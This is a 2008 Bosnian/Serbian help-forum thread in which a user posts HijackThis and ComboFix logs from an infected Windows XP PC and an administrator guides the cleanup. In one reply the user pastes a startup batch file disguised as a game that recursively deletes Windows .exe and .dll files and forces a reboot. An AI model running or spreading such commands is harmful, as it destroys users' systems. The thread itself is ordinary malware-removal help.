MyCity » Ambulanta -> Arhiva Ambulante » Hackovan?

Hackovan?

Napisano na dan: 20.2.2008

Strana:
1
2

Hackovan?

Sledeća strana

Pagination

Odgovori

Strana:
1
2

aMeR K Poslao: 20 Feb 2008 17:21 Idi na vrh
offline aMeR K Građanin Pridružio: 16 Apr 2007 Poruke: 64 Gde živiš: Sarajevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! problem sam primjetio kad je sestra zakacila onaj msn virus (koji salje .rar arhive svim kontaktima) uglavnom krenuo sam da ocistim taj virus i skeniram komp. Avira AntiVirom, Spybot S&D i otvorim Hijack This da vidim da ga nema i tu... kad imam sta da vidim Hijack This prepun svakakvih fajlova meni nepoznatih koje nikad nisam ni instalirao na sistem...i krenem ja tako brisat sve sto mu na kompjuteru nije mjesto (razumijem se u HijackThis znaci nisam nista sto ne treba brisao) ali javlja se problem kod nekoliko fajlova za koje HT kaze da se koriste i da ih iskljucim u Task Manageru.otvorim ja TM ali ni traga od tih procesa.pogledam u Backup HT-a i vidim da je on te fajlove obrisao (reaper.jpg , Tko Zeli Biti Milijunas.bat , Service UPS (fajl missing) , gurft.exe -ovaj zadnji fajl je onaj msn virus ako se sjecam dobro) znaci HT obrisao fajlove ali se oni jos uvijek pojavljuju kad skeniram a najvise me brine ovo reaper.jpg to je slika kad je otvorim pise Hacked by REAPER uglavnom evo loga pomagajte: Logfile of HijackThis v1.99.1 Scan saved at 17:09:05, on 20.2.2008 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.20733) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe C:\WINDOWS\system32\drivers\KodakCCS.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMTray.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe D:\Program Files\RocketDock\RocketDock.exe C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe C:\WINDOWS\system32\wuauclt.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Documents and Settings\Computer\My Documents\Applications\B3.exe O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe O4 - HKLM\..\Run: [avgnt] "C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min O4 - HKLM\..\Run: [ZoneAlarm Client] "D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" O4 - HKCU\..\Run: [RocketDock] "D:\Program Files\RocketDock\RocketDock.exe" O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [BirthdayRemember6] "D:\Program Files\BirthdayRemember\BirthdayRemember.exe" "autostart" O4 - Startup: ATITool.lnk = D:\Program Files\ATITool\ATITool.exe O4 - Startup: Yahoo! Widgets.lnk = D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe O4 - Global Startup: Kodak EasyShare software.lnk = D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe O4 - Global Startup: reaper.jpg O4 - Global Startup: Tko Zeli Biti Milijunas 8.0.2.bat O8 - Extra context menu item: Download all links with IDM - D:\Program Files\Internet Download Manager\IEGetAll.htm O8 - Extra context menu item: Download FLV video content with IDM - D:\Program Files\Internet Download Manager\IEGetVL.htm O8 - Extra context menu item: Download with IDM - D:\Program Files\Internet Download Manager\IEExt.htm O8 - Extra context menu item: E&xport to Microsoft Excel - [Link mogu videti samo ulogovani korisnici]\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O11 - Options group: [INTERNATIONAL] International* O11 - Options group: [TABS] Tabbed Browsing O17 - HKLM\System\CCS\Services\Tcpip\..\{5DAA73B5-BA99-453B-B50D-BDE4B1E5C866}: NameServer = 80.65.162.101 217.199.128.11 O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\PROGRA~1\WI1F86~1\MESSEN~1\MSGRAP~1.DLL O23 - Service: Print Spooler Service (abnda7guebpxo) - Unknown owner - C:\WINDOWS\system32\gurft.exe (file missing) O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe O23 - Service: Kodak Camera Connection Software (KodakCCS) - Eastman Kodak Company - C:\WINDOWS\system32\drivers\KodakCCS.exe O23 - Service: Cyberlink RichVideo Service(CRVS) (RichVideo) - Unknown owner - C:\Program Files\Cyberlink\Shared files\RichVideo.exe O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe O23 - Service: UPS - Unknown owner - C:\WINDOWS\System32\ups.exe (file missing) O23 - Service: TrueVector Internet Monitor (vsmon) - Zone Labs, LLC - C:\WINDOWS\system32\ZoneLabs\vsmon.exe Dopuna: 20 Feb 2008 17:21 ne vidim edit opciju sorry za dupli post zaboravio sam napisat da sam u zadnje vrijeme imao problema sa USB diskovima jer kad bih ih prikljucio na skolske racunare virus bi presao na USB i onda na moj racunar oglasi se Avira koja (valjda) virus uspjesno izbrise ... mozda je i do toga?

Profil

bobby Poslao: 20 Feb 2008 17:29 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Skini ComboFix sa jedne od sledecih adresa na Desktop: [Link mogu videti samo ulogovani korisnici] [Link mogu videti samo ulogovani korisnici] Startuj ga i ne diraj prozor programa dok skenira. Sledi uputstva na ekranu. Kada zavrsi pojavice se log (C:\ComboFix.txt) koji ces nam ovde iskopirati.

Profil

aMeR K Poslao: 20 Feb 2008 18:06 Idi na vrh
offline aMeR K Građanin Pridružio: 16 Apr 2007 Poruke: 64 Gde živiš: Sarajevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! doslo je do niza komplikacija nakon skeniranja nisam dirao prozor programa stavise pustio sam mis iz ruke skroz prvo je sve sa desktopa nestalo ostao samo combofix onda application error yahoo widgets onda jos jedan error ne znam tacno sta (izgledalo je kao pogresna run komanda davao mi samo OK kao klik) log sam jedva pronasao na C:\ComboFix(2)\ComboFix.txt ComboFix 08-02-20.2 - Computer 2008-02-20 17:33:34.1 - NTFSx86 Running from: C:\Documents and Settings\Computer\Desktop\ComboFix(2).exe WARNING -THIS MACHINE DOES NOT HAVE THE RECOVERY CONSOLE INSTALLED !! . ((((((((((((((((((((((((((((((((((((((( Other Deletions ))))))))))))))))))))))))))))))))))))))))))))))))) . C:\WINDOWS\system32\ebbfdccce6_d.dll C:\WINDOWS\system32\msssc.dll . ((((((((((((((((((((((((( Files Created from 2008-01-20 to 2008-02-20 ))))))))))))))))))))))))))))))) . 2008-02-20 17:31 . 2004-08-04 00:56 388,608 --a------ C:\WINDOWS\system32\kmd.exe 2008-02-14 10:12 . 2007-12-04 19:29 551,936 --------- C:\WINDOWS\system32\dllcache\oleaut32.dll 2008-02-14 10:12 . 2007-12-19 23:57 347,136 --------- C:\WINDOWS\system32\dllcache\dxtmsft.dll 2008-02-14 10:12 . 2007-12-18 10:51 179,584 --------- C:\WINDOWS\system32\dllcache\mrxdav.sys 2008-02-14 10:12 . 2008-01-11 06:57 44,544 --------- C:\WINDOWS\system32\dllcache\pngfilt.dll 2008-02-14 10:10 . 2007-11-07 10:50 727,040 --------- C:\WINDOWS\system32\dllcache\lsasrv.dll 2008-02-14 10:10 . 2007-10-30 18:20 360,064 --------- C:\WINDOWS\system32\dllcache\tcpip.sys 2008-02-02 00:34 . 2008-02-02 00:34 <DIR> d-------- C:\Documents and Settings\Computer\Application Data\Nero 2008-02-02 00:22 . 2008-02-02 00:22 <DIR> d-------- C:\Program Files\Nero 2008-02-02 00:22 . 2008-02-02 00:22 <DIR> d-------- C:\Program Files\Common Files\Nero 2008-02-02 00:22 . 2008-02-02 00:22 <DIR> d-------- C:\Documents and Settings\All Users\Application Data\Nero 2008-02-02 00:22 . 2006-03-17 11:45 1,757,184 --a------ C:\WINDOWS\system32\imagX7.dll 2008-02-02 00:22 . 2006-03-17 11:45 802,816 --a------ C:\WINDOWS\system32\imagXRA7.dll 2008-02-02 00:22 . 2006-03-17 11:45 497,296 --a------ C:\WINDOWS\system32\imagXpr7.dll 2008-02-02 00:22 . 2006-03-17 14:49 368,640 --a------ C:\WINDOWS\system32\TwnLib4.dll 2008-02-02 00:22 . 2006-03-17 11:45 258,048 --a------ C:\WINDOWS\system32\imagXR7.dll 2008-01-30 11:58 . 2008-01-30 11:58 38 --a------ C:\WINDOWS\avisplitter.INI 2008-01-29 09:58 . 2008-01-29 09:58 <DIR> d-------- C:\Program Files\AviSynth 2.5 2008-01-29 09:58 . 2006-10-07 17:43 502,784 --a------ C:\WINDOWS\x2.64.exe 2008-01-29 09:58 . 2007-11-13 09:31 399,360 --a------ C:\WINDOWS\system32\Smab.dll 2008-01-29 09:58 . 2005-02-28 13:16 240,128 --a------ C:\WINDOWS\system32\x.264.exe 2008-01-29 09:58 . 2006-04-12 09:47 217,073 --a------ C:\WINDOWS\meta4.exe 2008-01-29 09:58 . 2004-01-25 00:00 70,656 --a------ C:\WINDOWS\system32\i420vfw.dll 2008-01-29 09:58 . 2006-04-05 08:09 66,560 --a------ C:\WINDOWS\MOTA113.exe 2008-01-29 09:58 . 2005-07-14 12:31 27,648 --a------ C:\WINDOWS\system32\AVSredirect.dll 2008-01-29 09:57 . 2008-01-29 09:57 <DIR> d-------- C:\Program Files\eRightSoft 2008-01-28 10:32 . 2008-01-28 10:32 <DIR> d-------- C:\Program Files\Google . (((((((((((((((((((((((((((((((((((((((( Find3M Report )))))))))))))))))))))))))))))))))))))))))))))))))))) . 2008-02-20 16:34 53,248 ----a-w C:\WINDOWS\PSEXESVC.EXE 2008-02-20 16:04 --------- d-----w C:\Program Files\Mozilla Firefox 2008-02-20 16:02 1,610,612,736 --sha-w C:\pagefile.sys 2008-02-20 15:52 595,968 ----a-w C:\WINDOWS\Internet Logs\xDB54.tmp 2008-02-18 14:31 --------- d-----w C:\Documents and Settings\Computer\Application Data\LimeWire 2008-02-18 13:05 2,128,896 ----a-w C:\WINDOWS\Internet Logs\xDB53.tmp 2008-02-17 21:26 2,128,384 ----a-w C:\WINDOWS\Internet Logs\xDB52.tmp 2008-02-17 21:26 126,976 ----a-w C:\WINDOWS\Internet Logs\xDB51.tmp 2008-02-16 23:00 210,944 ----a-w C:\WINDOWS\Internet Logs\xDB4F.tmp 2008-02-16 23:00 2,127,360 ----a-w C:\WINDOWS\Internet Logs\xDB50.tmp 2008-02-16 17:45 2,126,848 ----a-w C:\WINDOWS\Internet Logs\xDB4E.tmp 2008-02-15 23:40 200,704 ----a-w C:\WINDOWS\Internet Logs\xDB4C.tmp 2008-02-15 23:40 2,123,776 ----a-w C:\WINDOWS\Internet Logs\xDB4D.tmp 2008-02-15 11:32 88,576 ----a-w C:\WINDOWS\Internet Logs\xDB4A.tmp 2008-02-15 11:32 2,122,752 ----a-w C:\WINDOWS\Internet Logs\xDB4B.tmp 2008-02-15 08:59 --------- d-----w C:\Documents and Settings\Computer\Application Data\DMCache 2008-02-15 08:55 --------- d-----w C:\Documents and Settings\Computer\Application Data\IDM 2008-02-14 21:58 110,080 ----a-w C:\WINDOWS\Internet Logs\xDB49.tmp 2008-02-14 13:07 269,312 ----a-w C:\WINDOWS\Internet Logs\xDB48.tmp 2008-02-14 10:21 --------- d-----w C:\Program Files\Internet Explorer 2008-02-14 09:14 --------- d-----w C:\Program Files\Common Files\Microsoft Shared 2008-02-13 21:50 134,144 ----a-w C:\WINDOWS\Internet Logs\xDB47.tmp 2008-02-13 12:44 2,108,416 ----a-w C:\WINDOWS\Internet Logs\xDB46.tmp 2008-02-13 12:44 114,688 ----a-w C:\WINDOWS\Internet Logs\xDB45.tmp 2008-02-12 22:03 1,691,648 ----a-w C:\WINDOWS\Internet Logs\xDB44.tmp 2008-02-11 21:52 2,098,176 ----a-w C:\WINDOWS\Internet Logs\xDB43.tmp 2008-02-11 21:52 1,703,936 ----a-w C:\WINDOWS\Internet Logs\xDB42.tmp 2008-02-07 23:29 293,888 ----a-w C:\WINDOWS\Internet Logs\xDB40.tmp 2008-02-07 23:29 2,083,328 ----a-w C:\WINDOWS\Internet Logs\xDB41.tmp 2008-02-07 18:09 --------- d-----w C:\Program Files\Windows Live 2008-02-07 18:01 --------- d-----w C:\Documents and Settings\All Users\Application Data\WLInstaller 2008-02-06 22:49 2,295,808 ----a-w C:\WINDOWS\Internet Logs\xDB3F.tmp 2008-02-05 22:49 --------- d-----w C:\Program Files\Common Files\Adobe 2008-02-05 22:49 --------- d-----w C:\Program Files\Adobe 2008-02-04 22:14 150,528 ----a-w C:\WINDOWS\Internet Logs\xDB3E.tmp 2008-02-04 14:19 638,464 ----a-w C:\WINDOWS\Internet Logs\xDB3D.tmp 2008-02-02 18:29 1,014,272 ----a-w C:\WINDOWS\Internet Logs\xDB3C.tmp 2008-02-01 23:22 --------- d-----w C:\Program Files\Common Files 2008-01-30 13:30 787,968 ----a-w C:\WINDOWS\Internet Logs\xDB3B.tmp 2008-01-30 09:15 --------- d-----w C:\Documents and Settings\All Users\Application Data\Spybot - Search & Destroy 2008-01-28 12:36 613,888 ----a-w C:\WINDOWS\Internet Logs\xDB3A.tmp 2008-01-18 21:29 354,816 ----a-w C:\WINDOWS\Internet Logs\xDB38.tmp 2008-01-18 21:29 1,915,904 ----a-w C:\WINDOWS\Internet Logs\xDB39.tmp 2008-01-18 11:46 2,369,564 ----a-w C:\WINDOWS\Internet Logs\tvDebug.zip 2008-01-18 02:18 103,424 ----a-w C:\WINDOWS\Internet Logs\xDB36.tmp 2008-01-18 02:18 1,913,344 ----a-w C:\WINDOWS\Internet Logs\xDB37.tmp 2008-01-17 20:33 168,960 ----a-w C:\WINDOWS\Internet Logs\xDB34.tmp 2008-01-17 20:33 1,912,320 ----a-w C:\WINDOWS\Internet Logs\xDB35.tmp 2008-01-17 14:41 166,400 ----a-w C:\WINDOWS\Internet Logs\xDB32.tmp 2008-01-17 14:41 1,907,712 ----a-w C:\WINDOWS\Internet Logs\xDB33.tmp 2008-01-17 12:32 --------- d-----w C:\Documents and Settings\All Users\Application Data\ATI 2008-01-17 12:28 --------- d-----w C:\Program Files\ATI Technologies 2008-01-17 00:30 277,504 ----a-w C:\WINDOWS\Internet Logs\xDB30.tmp 2008-01-17 00:30 1,881,088 ----a-w C:\WINDOWS\Internet Logs\xDB31.tmp 2008-01-16 14:52 453,632 ----a-w C:\WINDOWS\Internet Logs\xDB2E.tmp 2008-01-16 14:52 1,879,040 ----a-w C:\WINDOWS\Internet Logs\xDB2F.tmp 2008-01-15 21:04 293,888 ----a-w C:\WINDOWS\Internet Logs\xDB2D.tmp 2008-01-14 22:17 180,736 ----a-w C:\WINDOWS\Internet Logs\xDB2C.tmp 2008-01-14 16:38 --------- d--h--w C:\Program Files\InstallShield Installation Information 2008-01-14 11:51 48,128 ----a-w C:\WINDOWS\Internet Logs\xDB2B.tmp 2008-01-13 23:59 116,224 ----a-w C:\WINDOWS\Internet Logs\xDB2A.tmp 2008-01-13 21:26 473,088 ----a-w C:\WINDOWS\Internet Logs\xDB28.tmp 2008-01-13 21:26 1,847,808 ----a-w C:\WINDOWS\Internet Logs\xDB29.tmp 2008-01-12 14:23 334,336 ----a-w C:\WINDOWS\Internet Logs\xDB26.tmp 2008-01-12 14:23 1,835,520 ----a-w C:\WINDOWS\Internet Logs\xDB27.tmp 2008-01-12 00:25 693,760 ----a-w C:\WINDOWS\Internet Logs\xDB24.tmp 2008-01-12 00:25 1,833,472 ----a-w C:\WINDOWS\Internet Logs\xDB25.tmp 2008-01-11 05:57 44,544 ----a-w C:\WINDOWS\system32\pngfilt.dll 2008-01-10 17:07 735,744 ----a-w C:\WINDOWS\Internet Logs\xDB23.tmp 2008-01-08 20:23 1,416,704 ----a-w C:\WINDOWS\Internet Logs\xDB22.tmp 2008-01-07 20:50 903,168 ----a-w C:\WINDOWS\Internet Logs\xDB21.tmp 2008-01-07 00:06 504,320 ----a-w C:\WINDOWS\Internet Logs\xDB1F.tmp 2008-01-07 00:06 1,789,952 ----a-w C:\WINDOWS\Internet Logs\xDB20.tmp 2008-01-06 00:11 76,288 ----a-w C:\WINDOWS\Internet Logs\xDB1D.tmp 2008-01-06 00:11 1,777,664 ----a-w C:\WINDOWS\Internet Logs\xDB1E.tmp 2008-01-05 23:46 442,880 ----a-w C:\WINDOWS\Internet Logs\xDB1B.tmp 2008-01-05 23:46 1,777,152 ----a-w C:\WINDOWS\Internet Logs\xDB1C.tmp 2008-01-04 18:35 291,328 ----a-w C:\WINDOWS\Internet Logs\xDB19.tmp 2008-01-04 18:35 1,772,032 ----a-w C:\WINDOWS\Internet Logs\xDB1A.tmp 2008-01-04 14:32 313,344 ----a-w C:\WINDOWS\Internet Logs\xDB17.tmp 2008-01-04 14:32 1,769,472 ----a-w C:\WINDOWS\Internet Logs\xDB18.tmp 2008-01-04 00:23 272,384 ----a-w C:\WINDOWS\Internet Logs\xDB15.tmp 2008-01-04 00:23 1,768,448 ----a-w C:\WINDOWS\Internet Logs\xDB16.tmp 2008-01-03 12:47 --------- d-----w C:\Documents and Settings\Computer\Application Data\Passolo 6 2008-01-03 12:44 --------- d-----w C:\Documents and Settings\All Users\Application Data\Passolo 6 2008-01-02 23:39 569,856 ----a-w C:\WINDOWS\Internet Logs\xDB14.tmp 2008-01-01 21:26 120,832 ----a-w C:\WINDOWS\Internet Logs\xDB12.tmp 2008-01-01 21:26 1,753,600 ----a-w C:\WINDOWS\Internet Logs\xDB13.tmp 2008-01-01 18:22 23,552 ----a-w C:\WINDOWS\Internet Logs\xDB10.tmp 2008-01-01 18:22 1,731,584 ----a-w C:\WINDOWS\Internet Logs\xDB11.tmp 2008-01-01 18:19 421,376 ----a-w C:\WINDOWS\Internet Logs\xDBE.tmp 2008-01-01 18:19 1,751,552 ----a-w C:\WINDOWS\Internet Logs\xDBF.tmp 2008-01-01 15:43 792,576 ----a-w C:\WINDOWS\Internet Logs\xDBD.tmp 2008-01-01 15:31 --------- d-----w C:\Documents and Settings\Computer\Application Data\atitray 2008-01-01 15:20 472,576 ----a-w C:\WINDOWS\Radeon Omega Drivers v4.8.442 Uninstall.exe 2007-12-29 23:49 1,755,648 ----a-w C:\WINDOWS\Internet Logs\xDBC.tmp 2007-12-28 23:51 258,560 ----a-w C:\WINDOWS\Internet Logs\xDBB.tmp 2007-12-27 23:08 251,904 ----a-w C:\WINDOWS\Internet Logs\xDB9.tmp 2007-12-27 23:08 1,592,320 ----a-w C:\WINDOWS\Internet Logs\xDBA.tmp 2007-12-26 23:36 934,912 ----a-w C:\WINDOWS\Internet Logs\xDB7.tmp 2006-05-03 10:06 163,328 --sh--r C:\WINDOWS\system32\flvDX.dll 2007-02-21 11:47 31,232 --sh--r C:\WINDOWS\system32\msfDX.dll . ((((((((((((((((((((((((((((((((((((( Reg Loading Points )))))))))))))))))))))))))))))))))))))))))))))))))) . . Note empty entries & legit default entries are not shown REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "RocketDock"="D:\Program Files\RocketDock\RocketDock.exe" [2007-09-02 13:58 495616] "msnmsgr"="C:\Program Files\Windows Live\Messenger\MsnMsgr.exe" [2008-02-13 12:04 5724184] "BirthdayRemember6"="D:\Program Files\BirthdayRemember\BirthdayRemember.exe" [2007-09-14 00:38 2324480] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Smapp"="C:\Program Files\Analog Devices\SoundMAX\SMTray.exe" [2003-05-05 08:57 143360] "avgnt"="C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe" [2007-12-21 17:18 249896] "ZoneAlarm Client"="D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe" [2007-11-14 16:05 919016] "Adobe Reader Speed Launcher"="C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe" [2008-01-11 22:16 39792] [HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce] "nltide_3"="advpack.dll" [2007-12-07 03:01 124928 C:\WINDOWS\system32\advpack.dll] "ShowDeskFix"="regsvr32 /s /n /i:u shell32" [] C:\Documents and Settings\Computer\Start Menu\Programs\Startup\ ATITool.lnk - D:\Program Files\ATITool\ATITool.exe [2006-12-08 16:23:26 3035136] Yahoo! Widgets.lnk - D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe [2007-12-11 23:34:48 3746856] C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ Kodak EasyShare software.lnk - D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe [2003-06-25 06:25:38 614531] reaper.jpg [2007-12-20 08:47:13 152250] Tko Zeli Biti Milijunas 8.0.2.bat [2008-01-12 23:52:21 78] [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "DisableStatusMessages"= 0 (0x0) [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer] "NoDesktopCleanupWizard"= 1 (0x1) [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\policies\explorer] "NoSMHelp"= 1 (0x1) "NoResolveTrack"= 1 (0x1) "NoResolveSearch"= 1 (0x1) "NoSMConfigurePrograms"= 1 (0x1) [HKEY_USERS\.default\software\microsoft\windows\currentversion\policies\explorer] "NoSMHelp"= 1 (0x1) "NoResolveTrack"= 1 (0x1) "NoResolveSearch"= 1 (0x1) "NoSMConfigurePrograms"= 1 (0x1) R2 {95808DC4-FA4A-4c74-92FE-5B863F82066B};{95808DC4-FA4A-4c74-92FE-5B863F82066B};D:\Program Files\CyberLink\PowerDVD\000.fcl [2006-11-02 16:51] S1 atitray;atitray;C:\Program Files\Radeon Omega Drivers\v4.8.442\ATI Tray Tools\atitray.sys [] S2 abnda7guebpxo;Print Spooler Service;C:\WINDOWS\system32\gurft.exe [] S3 ddsxeiservice;ddsxeiservice2;D:\Program Files\Counter-Strike 1.6\sXe Injected\ddsxei.sys [2008-02-04 03:51] S3 motccgp;Motorola USB Composite Device Driver;C:\WINDOWS\system32\DRIVERS\motccgp.sys [2007-11-02 14:36] S3 motccgpfl;MotCcgpFlService;C:\WINDOWS\system32\DRIVERS\motccgpfl.sys [2007-01-23 19:03] S3 MotDev;Motorola Inc. USB Device;C:\WINDOWS\system32\DRIVERS\motodrv.sys [2007-10-10 16:41] S3 SFC4;SFC4;C:\WINDOWS\system32\drivers\SFC4.sys [1998-09-16 09:07] S3 usnjsvc;Messenger Sharing Folders USN Journal Reader service;"C:\Program Files\Windows Live\Messenger\usnsvc.exe" [2007-10-18 11:31] [HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b4355ea2-ce90-11dc-ace2-00111a746732}] \shell\Setup\command - setup.exe . ************************************************************************ catchme 0.3.1344 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, [Link mogu videti samo ulogovani korisnici] Rootkit scan 2008-02-20 17:35:06 Windows 5.1.2600 Service Pack 2 NTFS scanning hidden processes ... scanning hidden autostart entries ... scanning hidden files ... scan completed successfully hidden files: 0 ************************************************************************ .

Profil

bobby Poslao: 20 Feb 2008 22:16 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Udji u sledeci folder: C:\Documents and Settings\All Users\Start Menu\Programs\Startup\ Otvori fajl Tko Zeli Biti Milijunas 8.0.2.bat u Notepadu (nemoj slucajno startovati) i iskopiraj mi sadrzaj iz Notepada ovde na forum. Nakon toga u istom folderu obrisi sledece fajlove: reaper.jpg Tko Zeli Biti Milijunas 8.0.2.bat Kako se sada kompjuter ponasa?

Profil

aMeR K Poslao: 21 Feb 2008 15:34 Idi na vrh
offline aMeR K Građanin Pridružio: 16 Apr 2007 Poruke: 64 Gde živiš: Sarajevo	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! evo ovo fajl Tko Zeli Biti Milijunas ima u notepadu: @echo off del/s/q "C:\WINDOWS\.exe" del/s/q "C:\WINDOWS\.dll" shutdown -r izbrisao sam fajlove... Dopuna: 21 Feb 2008 15:34 ti fajlovi su izbrisani i iz HijackThis-a medjutim ostali su jos neki za koje mislim da ne treba da budu tu (boldirao sam a podvukao sam ovaj za koji sam siguran) Logfile of HijackThis v1.99.1 Scan saved at 15:27, on 2008-02-21 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v7.00 (7.00.6000.20733) Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\Ati2evxx.exe C:\WINDOWS\system32\ZoneLabs\vsmon.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\spoolsv.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe C:\WINDOWS\system32\drivers\KodakCCS.exe C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe C:\WINDOWS\system32\svchost.exe C:\Program Files\Analog Devices\SoundMAX\SMTray.exe C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe D:\Program Files\Zone Labs\ZoneAlarm\zlclient.exe D:\Program Files\RocketDock\RocketDock.exe C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe D:\Program Files\Kodak EasyShare\Kodak EasyShare software\bin\EasyShare.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe D:\Program Files\Yahoo!\Widgets\YahooWidgets.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Documents and Settings\Computer\My Documents\Applications\B3.exe O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - D:\PROGRA~1\SPYBOT~1\SDHelper.dll O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - 